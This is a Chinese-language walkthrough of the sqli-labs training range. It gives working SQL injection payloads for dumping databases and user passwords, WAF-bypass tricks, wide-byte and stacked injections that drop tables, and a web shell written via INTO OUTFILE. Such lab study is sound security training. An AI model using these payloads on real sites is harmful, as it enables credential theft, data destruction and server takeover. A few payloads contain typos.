@See you later

web靶场 --- sqli-labs

SQL注入的本质是用户输入的数据被当作代码执行

mysql语法：

查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='security'

查列:select column_name from information_schema.columns where table_name='users'

查字段: select username, password from security.users

less-1

Less-1/?id=1'

查看是否有注入

Less-1/?id=1' or 1=2 --+

Less-1/?id=1' and 1=2 --+

确实存在SQL注入漏洞

Less-1/?id=1' order by 3 --+

查看有多少列

先使用Less-1/?id=1' order by 3 --+

再使用Less-1/?id=1' order by 4 --+

所以得到users表有3列

Less-1/?id=-1' union select 1,2,3 --+

查看哪些数据可以回显

Less-1/?id=-1' union select 1,2 database() --+

查看当前数据库

Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

查看所有的数据库

Less-1/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

查看所有的表

Less-1/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'--+

查看列信息

Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+

直接可以得到所有的账号和密码，并且使用~符号进行分割。

less-2

Less-2/?id=1'

上一题包含单引号，本题没有单引号。

Less-2/?id=1 --+

less-3

Less-3/?id=1'

less-4

Less-4/?id=1'

Less-4/?id=1") --+

基础知识：

1.left()函数：left(database(),1)='s'

left(a,b)从左侧截取a的前b位，正确则返回1，错误则返回0

2.regexp函数：select user() regexp 'r'

user()的结果是 root ，regexp为匹配 root 的正则表达式

3.like函数：select user() like 'ro%'

匹配与regexp相似

4.substr(a,b,c) select substr() XXX

substr(a,b,c)从位置b开始，截取a字符串c位长度

5.ascii() 将某个字符串转化为 ascii 值

6.chr('数字') 或者是ord('字母') 使用python中的两个函数可以判断当前的ascii值是多少

对于 security 数据库：

select left(database(),1)='s';

前1位是否是s

select database() regexp 's';

匹配第一个字符是否是 s

select database() like 's%';

匹配第一个字符是否是 s

select substr((select database()),1.1)='s';

匹配第一个字符是否是 s

select substr((select database()),1,3)='sec;'

匹配前三个字符是否是 sec

select ascii(substr((select database()),1,1));

直接回显 115 或者是

select ascii(substr((select database()),1,1))>110;

如果大于 110，就会返回1，否则返回 0

less-5 bool型-1

Less-5/?id=1'

查看是否有注入

存在单引号

Less-5/?id=1' order by 3 --+

查看有多少列

Less-5/?id=1' order by 4 --+
所有存在3列

Less-5/?id=1' and left((select database()),1)='s' --+
判断第一位是否是s，然后使用burp进行爆破处理：

之后判断第二位left((select database()),2)='sa'特别麻烦，所以使用burp工具进行爆破处理。

右键，选择点击 Send to Intruder

先删除变量
添加变量（选中变量，并添加）
添加线程

找与众不同的

得到第一位确实是字符s

判断第二个字符
依次类推进行测试

完整注入流程（手动注入）

1.Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100 --+

通过二分法猜解得到所有的库，其中 limit 1,1的第一个1和式子中最后一个1为可变参数。

2.Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_name = 'security' limit 1,1),1,1))>1 --+

再次通过二分法可猜解得到 security 下的所有表。其中可变参数同上

3.Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1))>1 --+

通过二分法可猜解 users 内的字段。其中可变参数同上

4.Less-5/?id=1' and ascii(substr((select username from security.users limit 1,1),1,1))>1 --+

继续猜解即可得到字段内的值。

less-6

和less-5一样是布尔盲注。

Less-6/?id=1"

是双引号

补充知识

1.show variables like '%secure%';

查看 secure-file-priv 当前的值，如果显示为NULL，则需要打开phpstudy\PHPTutorial\MySQL\my.ini文件，在其中加上一句：secure_file_priv="/"

2.一句话木马：php版本：

其中 crow 是密码

3.into outfile写文件

用法：select 'mysql is very good' into outfile 'test1.txt';

文件位置：D:\phpstudy\PHPTutorial\MySQL\data

或者是select 'crow 666' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.txt';

文件位置：D:\phpStudy\PHPTutorial\WWW\sqli-labs\Less-7

注意事项：\\

less-7

同样是布尔盲注

Less-7/?id=1')) --+
Less-7/?id=-1')) union select 1,2,'' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php' --+

将一句话木马写入Less-7下的文件中
然后使用蚁剑链接

进行链接

拿到shell

less-8

也是布尔盲注

Less-8/?id=1'

判断此时存在注入漏洞

Less-8/?id=1' order by 3 --+

当3改为4的时候，you are in … 消失，说明存在3列

Less-8/?id=1' and left((select database()),1)='s' --+

猜出来当前第一位是s

或者是使用：

Less-8/?id=1' and ascii(substr((select database()),1,1))>16 --+

此时是有回显的

Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>17 --+

先通过大于号或者小于号来判断数据库的第一个字母是哪一个，也可以使用

Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1)) = 115 --+

此时可以验证数据库中第五个数据库的第一个字母是s

Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit 3,1)1,1))>11 -++

判断security是数据库中的第4个表中的数据的第一位是否大于11

Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1)1,1))>10 --+

同理，进行判断表中的字段，然后进行判断。可以得到 username，password

Less-8/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1)) --+

同理进行判断，最后再使用password进行判断。

因为猜解速度较慢，可以配合 burp或者sqlmap的脚本来使用。

补充知识

if(condition,A,B)如果条件condition为true，则执行语句A，否则执行B

例如：select if(1>2,4,5);返回的结果是5。（如果是在mysql命令行中使用，首先要use xxx是数据库才行）

less-8 法二

采用时间盲注

Less-8/?id=1' and sleep(5) --+

使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。

Less-8/?id=1' and if(length(database())=8,1,sleep(5)) --+

当为8的时候很快加载，而为其他值的时候加载较慢（5s左右），那就说明此时数据库的长度就是8（security）

Less-8/?id=1' and if(ascii(substr((selectdatabase()),1,1))>113,1,sleep(5)) --+

如果当前数据库的第一个字母的ascii值大于113的时候，会立刻返回结果，否则执行5s。

Less-8/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5)) --+

同理判断数据库中的第5个数据库的第一位的ascii的值是不是大于112（实际中是115），如果是的则速度返回，否则延时5s返回结果

其余步骤与法一基本类似，可以采用burp或者是sql盲注脚本使用

Less-9

Less-9/?id=1'

查看是否存在注入漏洞

Less/?id=1' order by 39999 -++

当使用 order by 的时候，此时无论如何都是回显 you are in … 所有无法使用 order by进行判断

Less-9/?id=1' and sleep(5) --+

当存在注入漏洞时，可以使用迟延注入进行判断，此时若存在漏洞，则睡眠5s之后再返回结果

Less-9/?id=1' and if(length(database())=8,1,sleep(5));

通过返回时间进行判断，此时如果数据长度为8，则可以较快返回。

Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1)1,1))>112,1,sleep(5)) --+

使用less-8中同样的方法进行判断即可！

因为盲注属于猜解，推荐使用脚本进行操作

Less-10

Less-10/?id=1"

查看是否存在注入漏洞
和Less-9一样，采用时间盲注

Less-11

以下均为POST内容

POST内容：uname='&passwd=18返回的结果显示存在 sql 语法错误，证明存在注入漏洞。或者是直接在username中填写'，password中随便写判断一下是否存在注入漏洞。

直接在username中填写admin' or 1=1#（此处不能使用--+，因为--+主要使用在url中，#是适用的）即：

uname=a' or 1=1# &passwd=a此时登录成功，可以验证存在注入漏洞。
此时在 password 位置进行验证：

uname=a & passwd=a' or 1=1#

登录成功，开始构造

uname=a' order by 2 # & passwd=a或者uname=a & passwd=a' order by 2 #

当使用uname=a' order by 3 # & passwd=a，发生报错

因此得出一共有两列。

uname=a' union select 1,2 # & passwd=a

查看哪些数据可以回显

uname=a' union select 1,database() # & passwd=a

查询当前数据库

当前数据库为security

uname=a' union select 1,group_concat(schema_name) from information_schema.schemata # & passwd=a

查询所有数据库名

uname=a' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' # & passwd=a

查询security库中的所有表名

uname=a' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # & passwd=a

查询users表中所有的字段名（列名）

uname=a' union select 1,group_concat(concat_ws('~',username,password)) from security.users # & passwd=a

查询 users 表中的 username、password 中的数据

Less-12

首先进行尝试：uname=admin' & passwd=a此时只是显示登录失败，没有其他的回显，将'换为"

uname=admin" & passwd=a 此时有回显，显示有报错信息，通过报错信息，我们知道如何构造：")

uname=a") or 1=1 #& passwd=a

和Less-11类似，Less-11是' '包裹，Less-12是(" ")包裹

Less-13

uname=a') or 1=1 # & passwd=a

没有回显，只能显示登录成功，登录失败

所以是布尔盲注类型

uname=a') or if(ascii(substr((select database()),1,1))>150,1,sleep(5)) # & passwd=a

查询使用的数据库名

使用二分法，进行测试

可以使用burp进行爆破

uname=a') or if(ascii(substr((select table_name from information_schema.tables where table_schema='schema_name' limit 1,1),1,1))>96,1,sleep(5)) # & passwd=a

查询数据库中的表名

if(ascii(substr((select column_name from information_schema.columns where table_name='table_name' limit 1,1),1,1))>96,1,sleep(5))

查询表中的列名

Less-14

同样，Less-14和Less-13类似，都是布尔盲注

步骤相似

uname=a" or 1=1 # & passwd=a

可以判断出Less-14是" "双引号包裹

Less-15

同样Less-15也是布尔盲注

uname=a' or 1=1 # & passwd=a

是由' '单引号包裹着

Less-16

同样Less-16也是布尔盲注

uname=a") or 1=1 # & passwd=a

是由(" ")单引号包裹着

补充知识

UPDATEXML(XML document,XPath string,new value);

第一个参数：XML document是String格式，为XML文档对象的名称，文中为Doc

第二个参数：XPath string（Xpath格式的字符串），如果不了解Xpath语法，可以在网上查找教程

第三个参数：new value，String格式，替换查找到的符合条件的数据

作用：改变文档中符合条件的节点的值

改变XML document中符合XPATH string的值

而我们注入语句为：

select updatexml(1,concat('~',(select username from security .users limit 0,1),'~'),1);

其中的concat()函数是将其连接成一个字符串，因此不会符合XPATH string的格式，从而出现格式错误，报出

ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'

格式：

and updatexml(1,concat('~',(构造语句),'~'),)

Less-17

报错注入

uname和passwd分开验证，而且在验证的时候对uname进行了过滤处理，将'进行了转义。

uname=admin' # & passwd=admin

uname=admin & passwd=admin' #

而没有对passwd进行过滤

首先我们要知道用户名的名字是多少，然后才可以进行接下来的操作。

uname=admin & passwd=adm' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) #

通过查询，可以得到security库下面的其中一个表名字

uname=admin & passwd=adm' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1),'~'),1) #

通过查询，可以得到users表里面的列名

Less-18

User Agent注入

安装一个插件：ModHeader

uname=admin & passwd=admin

输入正确的用户名和密码，得到User Agent信息

输入错误的信息则没有

并且会对其进行过滤。

1.登录失败显示ip地址

2.登录成功显示ip地址和User-Agent

3.$insert="insert into 'security'.'uagents'('uagent','ip_address','username') values('$uagent','$ip',$uname)";

4.经分析，需要进行闭合操作，两种方法

'or updatexml(1,concat('~',(database())),1) and '1'='1

or updatexml(1,concat('~',(database())),1),",")#

'or updatexml(1,concat('~',(database())),1) and '1'='1

查询当前数据库

'or updatexml(1,concat('~',(select schema_name from information_schema.schemata limit 0,1)),1) and '1'='1

查询数据库名

'or updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) and '1'='1

查询 security 数据库中的表

'or updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1)),1) and '1'='1

查询 users 表中的列名

'or updatexml(1,concat('~',(select username from security.users limit 0,1)),1) and '1'='1

查询 users 表中 username 列的数据

Less-19

Referer注入

1.登录成功显示的是Referer信息

2.登录失败是没有回显信息的

3.$insert ="insert into 'security'.'refers'('referer','ip_address') values('$uagent','$ip') ";

经分析后得知，需要进行闭合操作，两种方法：

'or updatexml(1,concat('~',(database())),1) and '1'=1

'or updatexml(1,concat('~',(database())),1),")#

步骤和Less-18类似

Less-20

登录成功后显示cookie

登录失败会显示失败信息

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

在登录之后后台会将username放入cookie中，再次登录的时候，只要cookie没有过期，就会去cookie里面取值，然后进行查询。

使用Cookie Editor

' union select 1,2,database() #

查询当前数据库名

' union select 1,2,group_concat(schema_name) from information_schema.schemata #

查询数据库名

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #

查询数据库security中的表名

Less-21

登录成功，得到cookie信息

使用在线加密解密工具进行解密

-1') union select 1,2,database() #

得到注入点，并进行base64进行加密

和Less-20类似，Less-20是' '单引号包裹

Less-21是(' ')包裹，且cookie进行了base64加密

步骤类似

Less-22

和Less-21基本相同，唯一区别是：Less-21是(' ')包裹，而Less-22是" "双引号包裹

Less-23

法一

Less-23/?id=1显示的有信息

Less-23/?id=1'

显示错误信息

使用Less-23/?id=1' --+和Less-23/?id=1'#都不行

查看源代码才发现使用了preg_replace函数

 preg_replace(
    string|array $pattern,
    string|array $replacement,
    string|array $subject,
    int $limit = -1,
    int &$count = null
): string|array|null

搜索 subject 中匹配 pattern 的部分，以 replacement 进行替换。

limit

每个模式在每个 subject 上进行替换的最大次数。默认是 -1(无限)。

count

如果指定，将会被填充为完成的替换次数。

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

将$id中的--+，#替换成空格，过滤掉。

可以使用另外一种特殊的注释符，;%00通过这个注释符绕过

id=1' order by 3 ;%00

判断列数为3

id=-1' union select 1,2,3 ;%00

查看哪些数据可以回显

id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata ;%00

查看所有数据库名

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' ;%00

查看security数据库中所有的表名

id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ;%00

查看users表中所有的字段名（列名）

id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users ;%00

查看users表中username，password字段的数据

法二

在url中构造：id=1' order by 10 or '1'='1已知这种构造是错误的，但是如何使用order by语句进行报错呢？

select * from users where id=1 and 1=1 order by 10;

在sql语句中，我们可以使用这种语法，原因是因为id=1 and 1=1作为where的条件，被执行之后得到结果，然后执行order by，因为结果中没有第10个字段所以报错了。在第二个查询语句中，order by在where的条件中，在where执行时被忽略了，得到结果之后并未再执行order by。

对于Less-23，id=1' or '1'='1 order by 10对应的sql语句：select * from users where id='1' or '1'='1 order by 10' limit 0,1 我们知道

永远都不可能有报错的情况，所以对此，Less-23中建议使用union select 进行

id=-1' union select 1,2,3,4 and '1' ='1使用这样的，或者使用 or，这是因为这里的 and 或 or 作为了联合查询第二个语句的条件而不是第一个语句 where 的条件。

id=1' and '1'='1

使用 and 或者是 or 都可以

id=1' union select 1,2,3'

使用union select进行闭合，其中要在3的位置进行闭合操作，但是在页面上没有显示1,2,3

id=-1' union select 1,2,3'此时我们将前面的值进行报错，使得前面的值无法被查询到（也可以在id=1的位置上使用一个较大的数字都是可以的）。此时1我们看到2,3位置有回显，可以选择使用2,3位置继续进行注入

（使用-1或者是任意一个超出数据库中的数据均可）

法三

使用报错注入

id=1' and updatexml(1,concat('~',database()),1) or '1'='1

报错出正在使用的数据库

id=1' and updatexml(1,concat('~',(select schema_name from information_schema.schemata limit 2,1)),1) or '1'='1 查询所有的数据库，使用limit进行逐个查询。

Less-24

本题是二次注入，可以参考

https://www.jianshu.com/p/3fe7904683ac

https://www.cnblogs.com/cute-puli/p/11145758.html

二次注入可以理解为，攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理，但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中，当Web程序调用存储在数据库中的恶意数据并执行SQL查询时，就发生了SQL二次注入。

二次注入，可以包括为以下两步：

第一步：插入恶意数据

进行数据库插入数据时，对其中的特殊字符进行了转义处理，在写入数据库的时候又保留了原来的数据。

第二步：引用恶意数据

开发者默认存入数据库的数据都是安全的，在进行查询时，直接从数据库中取出恶意数据，没有进行进一步的检验处理。

例如：输入参数id=1' -> 传输转义 id=1\' -> 此时转义之后无法注入 -> 存入数据库为1' -> 再次取出直接闭合

注册新用户，用户名为admin'#，密码为123456

并登录

修改密码为147258

然后，退出并重新登录

用户名为admin，密码是147258

通过越权的方法将admin用户之前的密码进行了修改

SQL语句：

update users set password='$pass' where username='$username' and password='$curr_pass'

update users set password='123456' where username='admin'#' and password='$curr_pass'

update users set password='123456' where username='admin'

补充知识

SQL注入WAF绕过

Waf绕过可大致分为三类：1.白盒绕过 2.黑盒绕过 3.fuzz测试

白盒绕过

通过源代码分析，来进行绕过，例：Less-25（代码审计）

黑盒绕过

(1)架构层面绕过waf

1.寻找源网站绕过waf

主要针对的是云waf，找到源网站的真实地址，进行绕过，有点像CDN

2.通过同网段绕过waf防护

在一个网段中，可能经过的数据不会经过云waf，从而实现绕过。

(2)资源限制角度绕过waf

一般waf的执行需要优先考虑业务优先的原则，所以对于构造较大、超大数据包可能不会进行检测，从而实现绕过waf

举例：get、post传参

(3)协议层面绕过waf

1.协议未覆盖绕过waf

比如由于业务需要，只对get型进行检测，post数据选择忽略

2.参数污染

index?id=1 & id=2 waf可能只对id=1进行检测

(4)规则层面的绕过waf

1.sql注释符绕过

(1)union/**/select我们将union select之间的空格使用注释符进行替换（适用于对union select之间的空格进行检测的情况）

(2)union/*abcd%0%32#*/select在注释符中间填充内容

(3)union/*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbccccccccddddddddddddddeeeeeeeeeeeee%%%%%%%%%%%%%%%%%%%%*/select

(4)/*!union select*/内联注释 mysql特有

以上均采用select 1;进行测试成功

2.空白符绕过

(1) mysql空白符：%09; %0A; %0B; %0D; %20; %0C; %A0; /*XXX*/

(2)正则空白符：%09; %0A; %0B; %0D; %20;

%25其实就是百分号 %25A0就是空白符

3.函数分割符号

将一个函数进行分割concat()

%25其实就是百分号 %25A0就是空白符123

concat%2520()

concat/**/()

concat%250c()

concat%25a0()

4.浮点数词法解释

waf对于id=1可以进行检测，但是对于id=1E0、id=1.0、id=\N可能就无法检测

5.利用error-based进行sql注入（报错注入）

extractvalue(1,concat(0x5c,md5(3)));

updatexml(1,concat(0x5d,md(3)),1);

GeometryCollecion((select * from (select * from (select@@ version)f)x))

polygon((select * from(select name const(version(),1))x))

linestring()

multipoint()

multilinestring()

multipolygon()

6.MySQL特殊语法

select {x schema_name} from {x information_schema.schemata};

select {x 1};

7.大小写绕过

如果对关键字 and or union等进行了过滤，可以考虑使用大小写混合的方法

Or aNd UniOn

但是很多时候有函数会部分大小写进行过滤，这个时候我们可以考虑使用双写的方法

8.关键字重复

OORr

9.关键字替换

如果还是无法绕过，可以考虑替换的方法

and -> && or-> like可以替换 = <>等价于!=

fuzz测试

可以使用burpsuite配合手工进行测试，后期测试成功后再脚本进行处理

Less-25

id=1'

查看是否存在注入

并且下面会显示注入的信息

id=1' order by 3 --+

查询列数的大小

提示注入的信息变为

得知order被过滤，变为der

id=1' ORder by 3 --+

变为大写也无法绕过

id=1' OORrder by 3 --+

使用关键字重复便可以绕过
id=-1' union select 1,2,3 --+

查看哪些数据可以回显

id=-1' union select 1,2,group_concat(schema_name) from infOORrmation_schema.schemata --+

查看所有数据库名

id=-1' union select 1,2,database() --+

查看当前使用的数据库名

id=-1' union select 1,2,group_concat(table_name) from infoORrmation_schema.tables where table_schema='security' --+

查看数据库security的所有表名

id=-1' union select 1,2,group_concat(column_name) from infoORrmation_schema.columns where table_name='users' --+

查看表users的所有列名（字段名）

id=-1' union select 1,2,group_concat(concat_ws('~',username,passwoORrd)) from security.users --+

查看表users中username，password的数据

Less-25a

id=1 --+

与Less-25 类似也是对or and进行过滤，Less-25是单引号包裹，Less-25a没有进行包裹

Less-26

查看源码

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

对注释进行了过滤，可以使用;%00绕过

过滤了空格，使用报错注入

id=1' || updatexml(1,concat('~',(database())),1) || '1'='1

查看当前使用的数据库

id=1' || updatexml(1,concat('~',(select (group_concat(concat_ws('~',username,passwoORrd))) from (security.users) where (id=1))),1) || '1'='1

得到第一组username，password的数据，通过修改where (id=2)来获取第二组数据，以此类推。

将空格替换为编码字符

补充知识

绕开空格：

%09 TAB键（水平）

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键（垂直）

%a0 空格

在docker 搭建的环境中，可以使用%a0进行绕过。

使用docker安装sqli-labs

1.搜索sqli-labs：docker search sqli-labs

2.建立镜像：docker pull acgpiano/sqli-labs

3.查看存在的镜像：docker images

4.运行存在的镜像：docker run -dt --name ck_sqli-labs -del -p 666:80 --rm acgpiano/sqli-labs

参数解释：-dt后台运行；--name 命名；-p 80:80将后面的docker容器端口映射到前面的主机端口，--rm选项，这样在容器退出时就能够自动清理容器内部的文件系统

5.进入运行中的docker容器：docker exec -it ID /bin/bash

参考链接：https://www.cnblogs.com/blogs-1024/p/11128999.html

docker基础命令

docker ps查看正在运行的容器

docker ps -a查看所有容器

docker images列出本地镜像

docker start CONTAINER启动一个或多少已经被停止的容器

docker stop CONTAINER 停止一个运行中的容器

docker restart CONTAINER重启容器

docker rm CONTAINER删除容器

docker rmi IMAGE 删除镜像

restart docker 重启 docker

Less-27

id=1 有数据

id=1'此时报错，说明可能存在注入

id=1';%00

成功将单引号进行闭合掉，说明存在注入

id=1' %a0 order %a0 by %a0 3 ;%00

表格中的字段数据存在3列

id=1' %a0 union %a0 select %a0 1,2,3 ;%00

此时返回错误，查看一下源码

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

union select大小写形式都进行了过滤

使用关键字重复进行绕过

id=9999' %a0 uniUNIONon %a0 seleSELECTct %a0 select %a0 1,2,3 ;%00

查看哪些数据可以回显

之后的操作相同

法二：使用报错注入

id=9999' %a0 || %a0 updatexml(1,concat('~',(SelEct %a0 group_concat(schema_name) %a0 from %a0 information_schema.schemata)),1) %a0 || %a0 '1'= '1

查看所有数据库名

报错语句格式updatexml(1,concat('~',语句),1)

因为报错注入使用concat得到的信息不全

所以使用limit语句一个个输出

id=9999' %a0 || %a0 updatexml(1,concat('~',(SelEct %a0 schema_name %a0 from %a0 information_schema.schemata %a0 limit %a0 3,1)),1) %a0 || %a0 '1'= '1

Less-27a

该题是" "双引号包裹

和Less-27相似

id=999" %a0 UniOn %a0 SeLEct %a0 1,2,3%a0 || %a0 "1"="1

查看哪些数据可以回显

id=999" %a0 UniOn %a0 SeLEct %a0 1,(SeLeCt %a0 group_concat(schema_name) %a0 from %a0 information_schema.schemata ),3 %a0 || %a0 "1"="1

查询所有数据库名

法二：时间盲注

id=1" %26%26 if(length(database())>5,1,sleep(5)) %26%26 %a0 "1"="1

注意：在句子后面不能使用 or，因为使用 or 的情况下，无论如何情况返回都会是真

id=999" || if(length(database())>5,1,sleep(5)) %26%26 %a0 "1"="1

A or B and D

在MySQL中，先判断A or B，判断结果为C，然后再判断 C and D

Less-28

id=1 有数据

id=1' 此时报错，说明可能存在注入

id=1' || '1'='1成功将单引号闭合

id=1' %a0 union %a0 select %a0 1,2,3 ;%00

这时却出现了错误

原来不单单是' '单引号包裹，应是(' ')包裹

id=999') %a0 union %a0 select %a0 1,2,3 || %a0 ('1')=('1

这样才正确

Less-28a

id=999') union %a0 select 1,2,3 --+

和Less-28类似

Less-29

Less-30

Less-31

补充知识

宽字节: GB2312、GBK、GB18030、BlIG5、Shift JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。中文、韩文、日文等均存在宽字节,英文默认都是一个字节。

在使用PHP连接MySQL的时候，当设置set character set client = gbk时会导致一个编码转换的问题。

例子：id=1'处理1\'进行编码1%5c%27 带入sql后id=\'and XXXX此时无法完成注入

id=1%df处理1%df\'进行编码1%df%5c%27带入sql后id=1进'and XXX此时存在宽字节注入漏洞

宽字节注入原理

GBK 占用两字节

ASCII占用一字节

PHP中编码为GBK，函数执行添加的是ASCII编码（添加的符号为“\”），MYSQL默认字符集是GBK等宽字节字符集。

大家都知道%df' 被PHP转义（开启GPC、用addslashes函数，或者icov等），单引号被加上反斜杠\，变成了 %df\'，其中\的十六进制是 %5C ，那么现在 %df\'=%df%5c%27，如果程序的默认字符集是GBK等宽字节字符集，则MySQL用GBK的编码时，会认为 %df%5c 是一个宽字符，也就是縗，也就是说：%df\' = %df%5c%27=縗'，有了单引号就好注入了。

转义对sql语句是没有影响的

Less-32

id=1 有数据

id=1'发现单引号'被过滤掉了

查看源码

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
    
    return $string;
}

id=1%df' --+成功绕过

id=-1%df' union select 1,2,3 --+

查看哪些数据发生回显

法二：

%5c代表的是\

此时构造：%5c %5c %5c %5c'

只要是我们能将返回的结果中对于单引号没有转义符进行处理即可

id=-1%aa%5c' union select 1,2,3 --+

Less-33

Less-32使用的是自定义的过滤，Less-33使用的是php中的addslashes()函数

作用：addalashes()函数返回在预定义字符之前添加反斜杠的字符串

法一：

直接使用宽字节的方法

id=1%df' --+

法二：

自定义闭合

id=1%aa%5c%27 --+

其余步骤与Less-32类似

Less-34

uname=admin&passwd=admin输入正确的密码和账号，返回正确信息

uname=ad&passwd=ad错误的密码和账号，返回登录失败

查看源码可知，使用了addslashes()函数，理论上可以使用前几关中的宽字节注入的方法进行测试，但是测试的时候发现，方法并不奏效。（主要原因是因为我们不能够直接在POST中传入数据，因为会被再次编码）

uname=ad%df\'&passwd=ad

在get型传参的时候使用URLencode

使用burp进行抓包修改

uname=ad%df' union select 1,2#&passwd=ad

查看哪些数据信息发生回显

Less-35

id=1输出正确信息

id=1'报错

id=1%df' --+还是报错

查看源码

function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

函数解析

addslashes(string $str): string

返回字符串，该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号（'）、双引号（"）、反斜线（\）与 NUL（null 字符）。

确实存在单引号' ' ,双引号" "反斜杠\过滤

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

而sql语句中id没有被包裹

id=-1 union select 1,2,3 --+

查看哪些数据存在回显

法二

采用延迟注入

id=1 and if( length(database())>5,1,sleep(5) ) --+

Less-36

与Less-35类似，Less-36的id被单引号' '包裹

id=-1%df' union select 1,2,3 --+

查看哪些数据可以回显

查看源码

function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

mysql_real_escape_string() 调用mysql库的函数 mysql_real_escape_string, 在以下字符前添加反斜杠: \x00, \n, \r, \, \', \" 和 \x1a

sql语句

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

注意：字符串进行十六进制转换，因为单引号全部会被转义

Less-37

和Less-34类似，只是使用的过滤函数不同，Less-37用的是mysql_real_escape_string函数

uname=ad%df' union select 1,2#&passwd=ad

补充知识

堆叠注入

Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条）一起执行。而在真实的运用中也是这样的，我们知道在mysql中，主要是命令行中，每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injectiono
可以在mysal命令行中进行测试:

select * from users; select 1,2,3;

Less-38

id=-1' union select 1,2,3; --+

查看哪些数据发送回显

id=1'; create table ck like users; --+

id=1'; drop table ck; --+

Less-39

id=-1 union select 1,2,3 --+

查看哪些数据发生回显

和Less-38类似，只是id没有被包裹

id=1; create table ck like users; --+

id=1; drop table ck; --+

Less-40

id=-1') union select 1,2,3 --+

查看哪些数据发生回显

id=1'); create table ck like users; --+

id=1'); drop table ck; --+

Less-41

id=-1 union select 1,2,3 --+

查看哪些数据发生回显

与Less-39不同的是，Less-39有报错信息，而Less-41没有报错信息

id=1; create table ck like users; --+

id=1; drop table ck; --+

Less-42

本题属于二次注入

查看源码

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

得到对username进行过滤，并没有对password进行过滤

对password进行注入

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

password被单引号' '包裹

通过修改HTML，便可查看密码

login_user=a&login_password=s'; create table ck #

login_user=a&login_password=s'; drop table ck #

Less-43

与Less-42类似，不同的区别在于

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

password被(' ')包裹

